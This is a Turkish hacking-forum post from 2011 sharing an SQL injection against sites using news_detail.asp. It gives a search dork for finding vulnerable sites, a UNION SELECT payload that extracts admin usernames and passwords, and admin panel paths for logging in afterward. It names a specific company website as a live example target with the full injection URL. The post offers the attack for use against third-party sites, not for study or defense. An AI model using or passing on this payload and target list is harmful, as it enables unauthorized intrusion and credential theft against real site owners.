Admin Kurucu / Root
Mesaj Sayısı : 552 Kayıt tarihi : 09/07/10 Yaş : 41 Nerden : Bursa
| Konu: news_detail.asp açıgı Cuma Eyl. 16, 2011 9:21 am | |
| Slm Değerli Arkadaşlar Bugun Rastladıgım Ve Szilerle Paylaşmak İstediğim Bir Sql Açıgı Arama Kodumuz : news_detail.asp?newID= Exploitimiz: /news_detail.asp?newID=119+union+select+0,1,2,usern ame,4,password,6,7,8,9,10,11,12,13+from+admins Admin Panel : /ecoms/ & /admin/ Açığı Anlamayan Olursa Konu Altında Belirtsin.. Not. Bazı Sitelerde Panelede Girdinizmi Menüdeki Kategorilere Girmiyor Bunu Kaynağı Görüntüleyerek Aşabilirsinz. Örnek BirKaç Site Kod: http://www.saraylizade.com.tr/wwwroot/news_detail.asp?newID=31+union+select+0,1,username,3,password,5,6,7,8,9,10,11+from+admins [Linkleri görebilmek için üye olun veya giriş yapın.] | |
|